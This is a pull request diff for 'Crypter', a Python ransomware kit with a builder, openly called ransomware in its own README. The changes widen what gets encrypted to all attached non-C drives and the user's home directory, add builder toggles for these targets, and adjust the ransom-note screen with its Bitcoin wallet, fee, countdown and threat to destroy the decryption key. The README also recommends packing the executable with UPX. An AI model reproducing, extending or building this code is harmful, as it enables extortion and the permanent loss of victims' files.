### PR TITLE
Merge of attached drive encryption feature branch

### DIFF
--- a/Crypter/Base.py
+++ b/Crypter/Base.py
@@ -112,24 +112,16 @@ class Base():
 
     def get_base_dirs(self, home_dir):
       # Function to return a list of base directories to encrypt
-      # TODO Detect presence of network drives
-      # TODO Improve overall functionality for getting list of locations to encrypt
-
-      base_dirs = [
-                    os.path.join(home_dir, "Desktop"),
-                    os.path.join(home_dir, "Documents"),
-                    os.path.join(home_dir, "Downloads"),
-                    os.path.join(home_dir, "Music"),
-                    os.path.join(home_dir, "Pictures"),
-                    os.path.join(home_dir, "Videos")
-                  ]
-
-
-      # Add attached drives and file shares, etc.
+      base_dirs = []
+      
+      # Add attached drives and file shares
       attached_drives = win32api.GetLogicalDriveStrings().split('\000')[:-1]
       for drive in attached_drives:
           if drive[0] != 'C':
               base_dirs.append(drive)
+      
+      # Add C:\\ user space directories
+      base_dirs.append(home_dir)
           
 
       return base_dirs

--- a/Crypter/Base.py
+++ b/Crypter/Base.py
@@ -110,18 +110,20 @@ class Base():
         ]
     
 
-    def get_base_dirs(self, home_dir):
+    def get_base_dirs(self, home_dir, __config):
       # Function to return a list of base directories to encrypt
       base_dirs = []
       
       # Add attached drives and file shares
-      attached_drives = win32api.GetLogicalDriveStrings().split('\000')[:-1]
-      for drive in attached_drives:
-          if drive[0] != 'C':
-              base_dirs.append(drive)
+      if __config["encrypt_attached_drives"] is True:
+          attached_drives = win32api.GetLogicalDriveStrings().split('\000')[:-1]
+          for drive in attached_drives:
+              if drive[0] != 'C':
+                  base_dirs.append(drive)
       
       # Add C:\\ user space directories
-      base_dirs.append(home_dir)
+      if __config["encrypt_user_home"] is True:
+          base_dirs.append(home_dir)
           
 
       return base_dirs

--- a/Crypter/Base.py
+++ b/Crypter/Base.py
@@ -7,6 +7,7 @@
 # Import libs
 import os
 import locale
+import win32api
 
 # Import classes
 
@@ -122,6 +123,14 @@ class Base():
                     os.path.join(home_dir, "Pictures"),
                     os.path.join(home_dir, "Videos")
                   ]
+
+
+      # Add attached drives and file shares, etc.
+      attached_drives = win32api.GetLogicalDriveStrings().split('\000')[:-1]
+      for drive in attached_drives:
+          if drive[0] != 'C':
+              base_dirs.append(drive)
+          
 
       return base_dirs
 

--- a/Crypter/Base.py
+++ b/Crypter/Base.py
@@ -8,6 +8,7 @@
 import os
 import locale
 import win32api
+import win32file
 
 # Import classes
 
@@ -108,6 +109,18 @@ class Base():
     FILES_TO_EXCLUDE = [
         "key.txt"
         ]
+
+    def is_optical_drive(self, drive_letter):
+        '''
+        @summary: Checks if the specified drive letter is an optical drive
+        @param drive_letter: The letter of the drive to check
+        @return: True if drive is an optical drive, otherwise false
+        '''
+        
+        if win32file.GetDriveType('%s:' % drive_letter) == win32file.DRIVE_CDROM:
+            return True
+        else:
+            return False
     
 
     def get_base_dirs(self, home_dir, __config):
@@ -118,7 +131,8 @@ class Base():
       if __config["encrypt_attached_drives"] is True:
           attached_drives = win32api.GetLogicalDriveStrings().split('\000')[:-1]
           for drive in attached_drives:
-              if drive[0] != 'C':
+              drive_letter = drive[0]
+              if drive_letter != 'C' and not self.is_optical_drive(drive_letter):
                   base_dirs.append(drive)
       
       # Add C:\\ user space directories

--- a/Crypter/GuiAbsBase.py
+++ b/Crypter/GuiAbsBase.py
@@ -17,9 +17,9 @@ import wx.xrc
 class MainFrame ( wx.Frame ):
 	
 	def __init__( self, parent ):
-		wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Crypter", pos = wx.DefaultPosition, size = wx.Size( -1,-1 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )
+		wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Crypter", pos = wx.DefaultPosition, size = wx.Size( 940,800 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.RESIZE_BORDER|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )
 		
-		self.SetSizeHintsSz( wx.Size( 940,780 ), wx.Size( -1,-1 ) )
+		self.SetSizeHintsSz( wx.Size( -1,-1 ), wx.Size( -1,-1 ) )
 		self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNTEXT ) )
 		self.SetBackgroundColour( wx.Colour( 177, 7, 14 ) )
 		
@@ -177,6 +177,7 @@ class MainFrame ( wx.Frame ):
 		
 		bSizer19 = wx.BoxSizer( wx.HORIZONTAL )
 		
+		bSizer19.SetMinSize( wx.Size( -1,40 ) ) 
 		
 		bSizer19.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )
 		
@@ -184,8 +185,6 @@ class MainFrame ( wx.Frame ):
 		bSizer19.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )
 		
 		self.ViewEncryptedFilesButton = wx.Button( self.m_panel10, wx.ID_ANY, u"View Encrypted Files", wx.DefaultPosition, wx.DefaultSize, 0 )
-		self.ViewEncryptedFilesButton.SetMinSize( wx.Size( 30,30 ) )
-		
 		bSizer19.Add( self.ViewEncryptedFilesButton, 1, wx.ALL|wx.EXPAND, 5 )
 		
 		self.EnterDecryptionKeyButton = wx.Button( self.m_panel10, wx.ID_ANY, u"Enter Decryption Key", wx.DefaultPosition, wx.DefaultSize, 0 )
@@ -212,7 +211,6 @@ class MainFrame ( wx.Frame ):
 		
 		self.SetSizer( MainSizer )
 		self.Layout()
-		MainSizer.Fit( self )
 		
 		self.Centre( wx.BOTH )
 	

--- a/Crypter/GuiAbsBase.py
+++ b/Crypter/GuiAbsBase.py
@@ -1,7 +1,7 @@
 # -*- coding: utf-8 -*- 
 
 ###########################################################################
-## Python code generated with wxFormBuilder (version Jun 17 2015)
+## Python code generated with wxFormBuilder (version Dec 21 2016)
 ## http://www.wxformbuilder.org/
 ##
 ## PLEASE DO "NOT" EDIT THIS FILE!
@@ -19,26 +19,25 @@ class MainFrame ( wx.Frame ):
 	def __init__( self, parent ):
 		wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Crypter", pos = wx.DefaultPosition, size = wx.Size( -1,-1 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )
 		
-		self.SetSizeHintsSz( wx.DefaultSize, wx.Size( -1,-1 ) )
+		self.SetSizeHintsSz( wx.Size( 940,780 ), wx.Size( -1,-1 ) )
 		self.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNTEXT ) )
 		self.SetBackgroundColour( wx.Colour( 177, 7, 14 ) )
 		
 		MainSizer = wx.BoxSizer( wx.VERTICAL )
 		
-		MainSizer.SetMinSize( wx.Size( 940,750 ) ) 
 		self.HeaderPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
 		HeaderSizer = wx.BoxSizer( wx.VERTICAL )
 		
 		self.TitleLabel = wx.StaticText( self.HeaderPanel, wx.ID_ANY, u"CRYPTER", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.TitleLabel.Wrap( -1 )
-		self.TitleLabel.SetFont( wx.Font( 48, 75, 90, 92, True, "Courier New" ) )
+		self.TitleLabel.SetFont( wx.Font( 48, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, True, "Courier New" ) )
 		self.TitleLabel.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNTEXT ) )
 		
-		HeaderSizer.Add( self.TitleLabel, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 20 )
+		HeaderSizer.Add( self.TitleLabel, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 10 )
 		
 		self.FlashingMessageText = wx.StaticText( self.HeaderPanel, wx.ID_ANY, u"YOUR FILES HAVE BEEN ENCRYPTED!", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.FlashingMessageText.Wrap( -1 )
-		self.FlashingMessageText.SetFont( wx.Font( 18, 75, 90, 92, False, "Courier New" ) )
+		self.FlashingMessageText.SetFont( wx.Font( 18, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.FlashingMessageText.SetForegroundColour( wx.Colour( 255, 255, 0 ) )
 		
 		HeaderSizer.Add( self.FlashingMessageText, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5 )
@@ -47,7 +46,7 @@ class MainFrame ( wx.Frame ):
 		self.HeaderPanel.SetSizer( HeaderSizer )
 		self.HeaderPanel.Layout()
 		HeaderSizer.Fit( self.HeaderPanel )
-		MainSizer.Add( self.HeaderPanel, 0, wx.ALL|wx.EXPAND, 5 )
+		MainSizer.Add( self.HeaderPanel, 1, wx.ALL|wx.EXPAND, 5 )
 		
 		self.BodyPanel = wx.Panel( self, wx.ID_ANY, wx.Point( -1,-1 ), wx.DefaultSize, wx.TAB_TRAVERSAL )
 		BodySizer = wx.BoxSizer( wx.VERTICAL )
@@ -75,31 +74,31 @@ class MainFrame ( wx.Frame ):
 		
 		self.TimeRemainingLabel = wx.StaticText( self.m_panel8, wx.ID_ANY, u"TIME REMAINING", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.TimeRemainingLabel.Wrap( -1 )
-		self.TimeRemainingLabel.SetFont( wx.Font( 16, 75, 90, 92, False, "Courier New" ) )
+		self.TimeRemainingLabel.SetFont( wx.Font( 16, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.TimeRemainingLabel.SetForegroundColour( wx.Colour( 255, 255, 0 ) )
 		
 		bSizer191.Add( self.TimeRemainingLabel, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 10 )
 		
 		self.TimeRemainingTime = wx.StaticText( self.m_panel8, wx.ID_ANY, u"00:00:00", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.TimeRemainingTime.Wrap( -1 )
-		self.TimeRemainingTime.SetFont( wx.Font( 16, 75, 90, 92, False, "Courier New" ) )
+		self.TimeRemainingTime.SetFont( wx.Font( 16, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.TimeRemainingTime.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNHIGHLIGHT ) )
 		
-		bSizer191.Add( self.TimeRemainingTime, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 0 )
+		bSizer191.Add( self.TimeRemainingTime, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
 		
 		
 		self.m_panel8.SetSizer( bSizer191 )
 		self.m_panel8.Layout()
 		bSizer191.Fit( self.m_panel8 )
-		bSizer20.Add( self.m_panel8, 1, wx.ALL|wx.EXPAND, 5 )
+		bSizer20.Add( self.m_panel8, 0, wx.ALL|wx.EXPAND, 5 )
 		
 		
 		bSizer17.Add( bSizer20, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.EXPAND, 5 )
 		
 		bSizer18 = wx.BoxSizer( wx.VERTICAL )
 		
-		self.RansomMessageText = wx.TextCtrl( self.BodyPanel, wx.ID_ANY, u"The important files on your computer have been encrypted with military grade AES-256 bit encryption.\n\nYour documents, videos, images and other forms of data are now inaccessible, and cannot be unlocked without the decryption key. This key is currently being stored on a remote server.\n\nTo acquire this key, transfer the Bitcoin fee to the Bitcoin wallet address before the time runs out.\n\nIf you fail to take action within this time window, the decryption key will be destoyed and access to your files will be permanently lost.\n\nFor more information on what Bitcoin is, and to learn where you can buy Bitcoins, click the Bitcoin button directly below the timer.", wx.DefaultPosition, wx.DefaultSize, wx.TE_MULTILINE|wx.TE_NO_VSCROLL|wx.TE_READONLY )
-		self.RansomMessageText.SetFont( wx.Font( 14, 75, 90, 90, False, "Courier New" ) )
+		self.RansomMessageText = wx.TextCtrl( self.BodyPanel, wx.ID_ANY, u"The important files on your computer have been encrypted with military grade AES-256 bit encryption.\n\nYour documents, videos, images and other forms of data are now inaccessible, and cannot be unlocked without the decryption key. This key is currently being stored on a remote server.\n\nTo acquire this key, transfer the Bitcoin fee to the Bitcoin wallet address before the time runs out.\n\nIf you fail to take action within this time window, the decryption key will be destoyed and access to your files will be permanently lost.\n\nFor more information on what Bitcoin is, and to learn where you can buy Bitcoins, click the Bitcoin button directly below the timer.", wx.DefaultPosition, wx.DefaultSize, wx.TE_MULTILINE|wx.TE_READONLY )
+		self.RansomMessageText.SetFont( wx.Font( 14, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Courier New" ) )
 		
 		bSizer18.Add( self.RansomMessageText, 3, wx.ALL|wx.EXPAND, 7 )
 		
@@ -107,7 +106,7 @@ class MainFrame ( wx.Frame ):
 		bSizer17.Add( bSizer18, 1, wx.EXPAND, 5 )
 		
 		
-		bSizer15.Add( bSizer17, 1, wx.EXPAND, 5 )
+		bSizer15.Add( bSizer17, 1, 0, 5 )
 		
 		
 		BodySizer.Add( bSizer15, 1, wx.EXPAND, 5 )
@@ -116,7 +115,7 @@ class MainFrame ( wx.Frame ):
 		self.BodyPanel.SetSizer( BodySizer )
 		self.BodyPanel.Layout()
 		BodySizer.Fit( self.BodyPanel )
-		MainSizer.Add( self.BodyPanel, 3, wx.ALL|wx.EXPAND, 20 )
+		MainSizer.Add( self.BodyPanel, 2, wx.ALL|wx.EXPAND, 20 )
 		
 		self.FooterPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
 		bSizer181 = wx.BoxSizer( wx.HORIZONTAL )
@@ -125,7 +124,7 @@ class MainFrame ( wx.Frame ):
 		bSizer22 = wx.BoxSizer( wx.VERTICAL )
 		
 		self.BitcoinButton = wx.BitmapButton( self.m_panel9, wx.ID_ANY, wx.NullBitmap, wx.DefaultPosition, wx.DefaultSize, wx.BU_AUTODRAW )
-		bSizer22.Add( self.BitcoinButton, 0, wx.ALIGN_CENTER_HORIZONTAL|wx.ALL, 5 )
+		bSizer22.Add( self.BitcoinButton, 0, wx.ALIGN_CENTER|wx.ALIGN_CENTER_HORIZONTAL|wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
 		
 		
 		self.m_panel9.SetSizer( bSizer22 )
@@ -142,14 +141,14 @@ class MainFrame ( wx.Frame ):
 		
 		self.WalletAddressLabel = wx.StaticText( self.m_panel10, wx.ID_ANY, u"WALLET ADDRESS:", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.WalletAddressLabel.Wrap( -1 )
-		self.WalletAddressLabel.SetFont( wx.Font( 12, 75, 90, 92, False, "Courier New" ) )
+		self.WalletAddressLabel.SetFont( wx.Font( 12, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.WalletAddressLabel.SetForegroundColour( wx.Colour( 255, 255, 0 ) )
 		
 		bSizer13.Add( self.WalletAddressLabel, 1, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
 		
 		self.WalletAddressString = wx.StaticText( self.m_panel10, wx.ID_ANY, u"1BoatSLRHtKNngkdXEeobR76b53LETtpyT", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.WalletAddressString.Wrap( -1 )
-		self.WalletAddressString.SetFont( wx.Font( 12, 75, 90, 92, False, "Courier New" ) )
+		self.WalletAddressString.SetFont( wx.Font( 12, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.WalletAddressString.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNHIGHLIGHT ) )
 		
 		bSizer13.Add( self.WalletAddressString, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
@@ -161,14 +160,14 @@ class MainFrame ( wx.Frame ):
 		
 		self.BitcoinFeeLabel = wx.StaticText( self.m_panel10, wx.ID_ANY, u"BITCOIN FEE", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.BitcoinFeeLabel.Wrap( -1 )
-		self.BitcoinFeeLabel.SetFont( wx.Font( 12, 75, 90, 92, False, "Courier New" ) )
+		self.BitcoinFeeLabel.SetFont( wx.Font( 12, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.BitcoinFeeLabel.SetForegroundColour( wx.Colour( 255, 255, 0 ) )
 		
 		bSizer14.Add( self.BitcoinFeeLabel, 1, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
 		
 		self.BitcoinFeeString = wx.StaticText( self.m_panel10, wx.ID_ANY, u"1.50", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.BitcoinFeeString.Wrap( -1 )
-		self.BitcoinFeeString.SetFont( wx.Font( 12, 75, 90, 92, False, "Courier New" ) )
+		self.BitcoinFeeString.SetFont( wx.Font( 12, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier New" ) )
 		self.BitcoinFeeString.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNHIGHLIGHT ) )
 		
 		bSizer14.Add( self.BitcoinFeeString, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL, 5 )
@@ -185,6 +184,8 @@ class MainFrame ( wx.Frame ):
 		bSizer19.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )
 		
 		self.ViewEncryptedFilesButton = wx.Button( self.m_panel10, wx.ID_ANY, u"View Encrypted Files", wx.DefaultPosition, wx.DefaultSize, 0 )
+		self.ViewEncryptedFilesButton.SetMinSize( wx.Size( 30,30 ) )
+		
 		bSizer19.Add( self.ViewEncryptedFilesButton, 1, wx.ALL|wx.EXPAND, 5 )
 		
 		self.EnterDecryptionKeyButton = wx.Button( self.m_panel10, wx.ID_ANY, u"Enter Decryption Key", wx.DefaultPosition, wx.DefaultSize, 0 )
@@ -206,7 +207,7 @@ class MainFrame ( wx.Frame ):
 		self.FooterPanel.SetSizer( bSizer181 )
 		self.FooterPanel.Layout()
 		bSizer181.Fit( self.FooterPanel )
-		MainSizer.Add( self.FooterPanel, 1, wx.ALL|wx.EXPAND, 7 )
+		MainSizer.Add( self.FooterPanel, 1, wx.ALL|wx.EXPAND, 20 )
 		
 		
 		self.SetSizer( MainSizer )

--- a/Crypter/Main.py
+++ b/Crypter/Main.py
@@ -205,7 +205,7 @@ class Crypter(Base.Base):
         encrypted_files.append(file)
 
     # Write out list of encrypted files
-    if encrypted_files:
+    if encrypted_files or (not self.__config["encrypt_user_home"] and not self.__config["encrypt_attached_drives"]):
       fh = open(self.encrypted_file_list, "w")
       for encrypted_file in encrypted_files:
         fh.write(encrypted_file)

--- a/Crypter/Main.py
+++ b/Crypter/Main.py
@@ -220,7 +220,7 @@ class Crypter(Base.Base):
     '''
     binary_name = os.path.split(sys.argv[0])[1]
 
-    base_dirs = self.get_base_dirs(os.environ['USERPROFILE'])
+    base_dirs = self.get_base_dirs(os.environ['USERPROFILE'], self.__config)
     file_list = []
 
     for directory in base_dirs:

--- a/README.md
+++ b/README.md
@@ -59,10 +59,10 @@ Before cloning the repository and attempting to build Crypter, you must first me
 | pypiwin32 | 219 | [219](https://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/) |
 | PyCrypto | 2.6.1 | [2.6.1](http://www.voidspace.org.uk/python/modules.shtml#pycrypto) |
 | Ordered Dict | 1.1 | [1.1](https://pypi.python.org/pypi/ordereddict) |
-| WxPython | 3.0 | [3.0](https://sourceforge.net/projects/wxpython/files/wxPython/3.0.0.0/) |
-| ~~\*UPX~~ | ~~3.94w~~ | ~~[3.94w](https://github.com/upx/upx/releases/tag/v3.94)~~ |
+| WxPython | 3.0.2.0 | [3.0.2.0](https://sourceforge.net/projects/wxpython/files/wxPython/3.0.2.0/) |
+| \*UPX | 3.94w | [3.94w](https://github.com/upx/upx/releases/tag/v3.94) |
 
-~~\*The [UPX Packer](https://upx.github.io/) is an optional, but highly recommended tool that the builder can use to pack the ransomware executable. UPX will allow you to reduce the size of the binary that PyInstaller produces by several Megabytes.~~ There currently appears to be a problem with UPX which prevents the Crypter executable from successfully running. Until this problem is resolved, I recommend not attempting to pack the executable.
+\*The [UPX Packer](https://upx.github.io/) is an optional, but highly recommended tool that the builder can use to pack the ransomware executable. UPX will allow you to reduce the size of the binary that PyInstaller produces by several Megabytes.
 
 Once the above software is installed you will be able to launch the builder.
 

--- a/build/ExeBuilder/Base.py
+++ b/build/ExeBuilder/Base.py
@@ -76,11 +76,10 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "label": "Builder Language",
             "label_object_name": "BuilderLanguageLabel",
             "input_object_name": "BuilderLanguageChoice",
-            "regex": re.compile(ur"^%s$" % "|".join(SUPPORTED_LANGUAGES)), # Choice box so validation not required
             "example": "English or Русский",
             "input_requirement": "One of the supported languages",
             "config_area": "Language",
-            "validate": True,
+            "validate": False,
             "default": "English"
             }
     ),

--- a/build/ExeBuilder/Base.py
+++ b/build/ExeBuilder/Base.py
@@ -80,6 +80,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "English or Русский",
             "input_requirement": "One of the supported languages",
             "config_area": "Language",
+            "validate": True,
             "default": "English"
             }
     ),
@@ -88,10 +89,10 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "label": "Debug verbosity level",
             "label_object_name": "DebugLevelLabel",
             "input_object_name": "DebugLevelChoice",
-            "regex": re.compile("^.*$"), # Choice box so validation not required
             "example": "0 - Minimal",
             "input_requirement": "Build process debug level",
             "config_area": "Debug",
+            "validate": False,
             "default": "1 - Low"
             }
     ),
@@ -103,6 +104,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "regex": re.compile("^([A-Za-z0-9]{16})?$"),
             "example": "093AC769F6557577452E9DB2C74B984A",
             "input_requirement": "A 16 byte(character) string of alphanumeric characters",
+            "validate": True,
             "config_area": "Binary Settings"
             }
     ),
@@ -115,6 +117,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "C:\\Program Files\\upx394w",
             "input_requirement": "A path pointing to the UPX Packer directory",
             "default": "",
+            "validate": True,
             "config_area": "Binary Settings"
             }
     ),
@@ -127,7 +130,26 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "C:\\Users\\test\\icon.ico",
             "input_requirement": "A file path pointing to the location of a valid .ico icon file",
             "default": "",
+            "validate": True,
             "config_area": "Binary Settings"
+            }
+    ),
+    (
+        "encrypt_attached_drives", {
+            "label": "Encrypt Attached Drives",
+            "input_object_name": "EncryptAttachedDrivesCheckbox",
+            "default": False,
+            "validate": False,
+            "config_area": "Ransomware Settings"
+            }
+    ),
+    (
+        "encrypt_user_home", {
+            "label": "Encrypt User Home",
+            "input_object_name": "EncryptUserHomeCheckbox",
+            "default": False,
+            "validate": False,
+            "config_area": "Ransomware Settings"
             }
     ),
     (
@@ -139,6 +161,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "locked",
             "input_requirement": "A series of alphanumeric character(s)",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": "locked"
             }
     ),
@@ -152,6 +175,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "input_requirement": "A bitcoin wallet address as a series of alphanumeric" 
                                  " characters (26-35 characters in length",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": "12mdKVNfAhLbRDLtRWQFhQgydgU6bUMjay"
             }
     ),
@@ -164,6 +188,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "0.0897",
             "input_requirement": "A valid integer or floating point number",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": "1.0"
             }
      ),
@@ -176,6 +201,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "259200",
             "input_requirement": "A valid integer or floating point number",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": "259200"
             }
     ),
@@ -188,6 +214,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "input_requirement": "A valid integer",
             "example": "512",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": "512"
             }
     ),
@@ -200,6 +227,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "pdf,exe,msi,doc",
             "input_requirement": "A comma-separated list of filetypes to encrypt",
             "config_area": "Ransomware Settings",
+            "validate": True,
             "default": ",".join(ENCRYPTABLE_FILETYPES)
         }
     ),
@@ -211,6 +239,7 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
             "example": "",
             "input_requirement": "Ransom message/note",
             "config_area": "Ransomware Settings",
+            "validate": False,
             "default": RANSOM_MESSAGE
         }
     )
@@ -220,13 +249,15 @@ BUILDER_CONFIG_ITEMS = OrderedDict([
 @summary: Runtime configuration items. To be written to the Ransomware's runtime config file
 '''
 RUNTIME_CONFIG_ITEMS = [
+    "encrypt_attached_drives",
+    "encrypt_user_home",
     "encrypted_file_extension",
     "wallet_address",
     "bitcoin_fee",
     "key_destruction_time",
     "max_file_size_to_encrypt",
     "filetypes_to_encrypt",
-    "ransom_message"
+    "ransom_message",
     ]
 
 RUNTIME_CONFIG_PATH = "Resources/runtime.cfg"

--- a/build/ExeBuilder/BuilderGuiAbsBase.py
+++ b/build/ExeBuilder/BuilderGuiAbsBase.py
@@ -17,7 +17,7 @@ import wx.xrc
 class MainFrame ( wx.Frame ):
 	
 	def __init__( self, parent ):
-		wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Crypter Builder", pos = wx.DefaultPosition, size = wx.Size( 640,850 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )
+		wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Crypter Builder", pos = wx.DefaultPosition, size = wx.Size( 640,850 ), style = wx.CAPTION|wx.CLOSE_BOX|wx.MINIMIZE_BOX|wx.RESIZE_BORDER|wx.SYSTEM_MENU|wx.TAB_TRAVERSAL )
 		
 		self.SetSizeHintsSz( wx.DefaultSize, wx.DefaultSize )
 		self.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_BTNFACE ) )

--- a/build/ExeBuilder/BuilderGuiAbsBase.py
+++ b/build/ExeBuilder/BuilderGuiAbsBase.py
@@ -1,7 +1,7 @@
 # -*- coding: utf-8 -*- 
 
 ###########################################################################
-## Python code generated with wxFormBuilder (version Jun 17 2015)
+## Python code generated with wxFormBuilder (version Dec 21 2016)
 ## http://www.wxformbuilder.org/
 ##
 ## PLEASE DO "NOT" EDIT THIS FILE!
@@ -34,7 +34,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.LoadConfigFileLabel = wx.StaticText( self.m_panel312, wx.ID_ANY, u"Load Config file", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.LoadConfigFileLabel.Wrap( -1 )
-		self.LoadConfigFileLabel.SetFont( wx.Font( 9, 74, 90, 92, False, "Arial" ) )
+		self.LoadConfigFileLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Arial" ) )
 		
 		bSizer49.Add( self.LoadConfigFileLabel, 0, wx.ALIGN_CENTER_VERTICAL|wx.ALL|wx.TOP, 5 )
 		
@@ -70,7 +70,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.TitleLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Crypter Builder", wx.DefaultPosition, wx.DefaultSize, wx.ALIGN_CENTRE )
 		self.TitleLabel.Wrap( -1 )
-		self.TitleLabel.SetFont( wx.Font( 22, 75, 90, 92, False, "Courier" ) )
+		self.TitleLabel.SetFont( wx.Font( 22, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False, "Courier" ) )
 		self.TitleLabel.SetForegroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_GRAYTEXT ) )
 		self.TitleLabel.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
 		
@@ -78,7 +78,7 @@ class MainFrame ( wx.Frame ):
 		
 		self.SubtitleLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Created by Sithis993", wx.DefaultPosition, wx.DefaultSize, wx.ALIGN_CENTRE )
 		self.SubtitleLabel.Wrap( -1 )
-		self.SubtitleLabel.SetFont( wx.Font( 9, 75, 90, 90, False, "Courier" ) )
+		self.SubtitleLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL, False, "Courier" ) )
 		
 		bSizer44.Add( self.SubtitleLabel, 0, wx.ALL|wx.EXPAND, 5 )
 		
@@ -87,37 +87,37 @@ class MainFrame ( wx.Frame ):
 		
 		self.QuickBuildTitleLabel = wx.StaticText( self.GuideScrollableWindow, wx.ID_ANY, u"Quick Build", wx.DefaultPosition, wx.DefaultSize, 0 )
 		self.QuickBuildTitleLabel.Wrap( 359 )
-		self.QuickBuildTitleLabel.SetFont( wx.Font( 9, 75, 90, 92, True, "Courier" ) )
+		self.QuickBuildTitleLabel.SetFont( wx.Font( 9, wx.FONTFAMILY_MODERN, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, True, "Courier" ) )
 		
